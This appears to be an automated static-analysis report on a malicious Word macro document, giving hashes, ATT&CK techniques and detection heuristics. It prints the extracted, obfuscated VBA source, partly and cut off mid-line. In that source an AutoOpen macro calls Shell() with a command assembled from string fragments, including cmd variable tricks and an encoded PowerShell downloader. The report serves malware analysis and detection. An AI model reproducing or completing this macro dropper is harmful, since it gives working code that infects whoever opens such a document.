Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0cb0fc88c3e37502…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 105.8 KB
Created: 2018-06-05 22:34:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18

MD5: 47d94a02c9f91b1d818c5b5119522da2
SHA-1: f9c34ed106b5bfa637130c8fd3d07aa844d58a1e
SHA-256: 0cb0fc88c3e37502f575bdf4afe56e35bf0598bc03152d220ccab1dbbe756d3a

Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that calls Shell(). The Shell() call executes a command string that appears to be built to download and execute a payload. The reconstructed command string is 'md DSiATmiSSHh COXCOLhtNQwLqEQwYn Pmqj QcJACzKDOcqO s & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c '. This indicates downloader or dropper functionality.

Heuristics (6)

  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  11887 bytes
SHA-256: 486e6cbe6f2bf23d9bddb2ded1ba04f7dfc406813a5a5e2158a1772cc580a231
Preview (script): first 1,000 lines of the extracted script
Attribute VB_Name = "ucLncQKUY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FMmNtW()
On Error Resume Next
SjOVh = Hex(HQLfJ + Hex(ZzsswD) * 22012 + Round(uvMqwU))
kXBzjt = Cos(wWUtBN)
zOjiT = CDate(zciJnM)
IXTYYN = Cos(WsJha)
lzVYC = Hex(wUuhj + Hex(dXsIo) * 83817 + Round(WEfaD))
VnwzGE = Cos(EOKwGK)
kOUNp = CDate(LupWOD)
XDzFY = Cos(bhOzW)
FMmNtW = WnzQtcEjRi + Shell(faMaBJJjko + Chr(iVdGfrhQWA + vbKeyC + OmBLzt) + HjcVNTZJ + JLzDCqBTAP + EmJIoomFn + jWpQrziTL + lQTMpXdzOkW + ohlkiCjO + OPdijVXMK, 56800 - 56800)
diIPNt = Hex(ikZHj + Hex(kQlaz) * 53832 + Round(ClaAPF))
niZWP = Cos(aMECfc)
MZhwvP = CDate(nCqGQX)
krHIzH = Cos(OvKDs)
End Function
Sub Autoopen()
On Error Resume Next
rYMiuV = Hex(XdDcEz + Hex(mlsTF) * 83607 + Round(pVwuf))
IwdXu = Cos(iwPqH)
vYPHn = CDate(DAqhcC)
wBZCCP = Cos(OzqYzj)
FMmNtW
BUUXvl = Hex(JTwhi + Hex(qfibW) * 52036 + Round(wCFuMa))
zvhrH = Cos(wCfVK)
RkoidU = CDate(zzjVP)
YAlwP = Cos(KURJNl)
End Sub


Attribute VB_Name = "abVozIQ"
Function HjcVNTZJ()
On Error Resume Next
upAobt = Hex(CcUrU + Hex(HJnaw) * 7179 + Round(BtUSf))
KVqDh = Cos(zDafF)
CniwLz = CDate(TGRrl)
FcjvA = Cos(hJPiB)
fKhwzQizd = "md DSiATmiSSHh" + " COXCO" + "LhtNQwLqEQwYn" + "Pmqj"
YniUR = Hex(iizuQu + Hex(iVuLF) * 85264 + Round(EfbjPI))
KXQmE = Cos(jnLpzo)
NDYLMo = CDate(SwnzJq)
ItMCF = Cos(GTKjH)
VAJYZkXwPzO = " QcJ" + "ACzKDOc" + "qO" + "s &     %^c^o^" + "m^S^p^E^c^%    " + " %^c^o^m^S^p^E^" + "c^%     /V   " + "      " + "/c       " + "   "
RUvKF = Hex(QHQAG + Hex(TaRHL) * 69144 + Round(dOFbt))
ntjits = Cos(DBXWXo)
ltjHHm = CDate(iirzHa)
iwLsB = Cos(RSkcW)
NYHtZWM = " set " + "%COuwU" + "RmVT" + "adiNVu%=RzMfkl" + "lBjq" + "&&se" + "t " + "%wHXXwwmpjLk"
RMSDv = Hex(XBhkfw + Hex(GDEPp) * 59621 + Round(RZZELd))
dQTIG = Cos(wVjPav)
kZiuR = CDate(XuHMC)
zjqsmO = Cos(ROtlOb)
TTzOkRwM = "%=p&&set %" + "zfVQCi" + "cQiHbnsP%=" + "o^w&&set %NF"
NVlTp = Hex(tPBsqf + Hex(wFbVDQ) * 24559 + Round(BHczB))
dBqnUS = Cos(ABJoXN)
ihwBH = CDate(tLmXhw)
PLOIV = Cos(GPOLEW)
MJAjq = "szzzpXuJtQSYw%=" + "zCfR" + "odQkw&&set %Ri" + "tDTuB%=!" + "%wH" + "XXwwm" + "pjLk%!&&set %ci" + "jIQc" + "sRiEjdVci%"
szESj = Hex(CKaTJb + Hex(YpSOSG) * 42720 + Round(ionAS))
HmTWtf = Cos(jvHUqB)
EosEhf = CDate(Rzzsw)
JOJQR = Cos(zuXGw)
fwCRdDF = "=p" + "bkaAhoiTojWO" + "&&set %Fh" + "nZnnZcE" + "lIf%=e^" + "r&&set %KzalpDU" + "LUTzc"
vvptK = Hex(bEazpv + Hex(SnTqpU) * 59109 + Round(flVmrD))
DAjhwo = Cos(jaXmGQ)
ZJYNjw = CDate(dEimRU)
KUHSq = Cos(BZSHzu)
XnOcmFF = "n%=!" + "%zfVQCicQiHbn" + "sP%!&&set %Wd" + "TRpSir%" + "=s&&set %Cjp" + "IAVVFPij" + "AznT%=obZBYwC" + "jJ&&set %MbFUn" + "wp%=he&"
HjcVNTZJ = fKhwzQizd + VAJYZkXwPzO + NYHtZWM + TTzOkRwM + MJAjq + fwCRdDF + XnOcmFF
End Function
Function JLzDCqBTAP()
On Error Resume Next
DtSCOO = Hex(FbwYK + Hex(Cawzv) * 58669 + Round(VZGQU))
RszrQ = Cos(mRXkl)
YDRKjX = CDate(IlwadV)
VaLdm = Cos(iwzJG)
BpsbQCULiZM = "&set %kfjRhIsmw" + "KX%=ll&&!%R" + "itDTuB%!!%Kz" + "alpDULUTzcn%!!%" + "Fhn"
fKYmip = Hex(RWbCK + Hex(ihLiUR) * 43749 + Round(DsLGt))
jzaFIE = Cos(sYjwSl)
DqtXA = CDate(EUWUds)
ObRMjl = Cos(bUwVuG)
mkXuiDTzTc = "ZnnZcElIf%!!" + "%WdTRpSir" + "%!!%MbFUnw" + "p%!!%kf" + "jRhIsmwK" + "X%!  -e IAAmA" + "CgAIAAkAHMASABl" + "AGwATABJ" + "AGQAWwAxAF0AKw"
qJcfBj = Hex(SNzoF + Hex(tPbGc) * 30304 + Round(kQHWS))
tqjuXd = Cos(wNKtob)
ivOSY = CDate(fzMsqt)
kGZCFN = Cos(mOjTb)
KCqkali = "AkAHMAaABF" + "AGwATA" + "BpAEQA" + "WwAxADMAX" + "QArAC" + "cAWAAnACkA" + "KABOAGUAdw" + "AtAE8AYgB" + "KAEUAQwB0ACAA" + "IABJA"
LJfEh = Hex(ADqpC + Hex(wqBwiq) * 8038 + Round(wJpoIn))
GaQLur = Cos(QVRHL)
sbuRX = CDate(HWUqj)
PwMBUr = Cos(tpudad)
LpDSwhYqL = "E8ALgBjAE8ATQ" + "BwAHIAZQB" + "TAFMAaQBvAG4A" + "LgBkAEUAR" + "gBMA" + "EEAVABFAHMAVABy" + "AGUAYQBtA" + "CgAIABb" + "AG"
zlafi = Hex(iflXP + Hex(QvjFm) * 69596 + Round(SfuAO
... (truncated)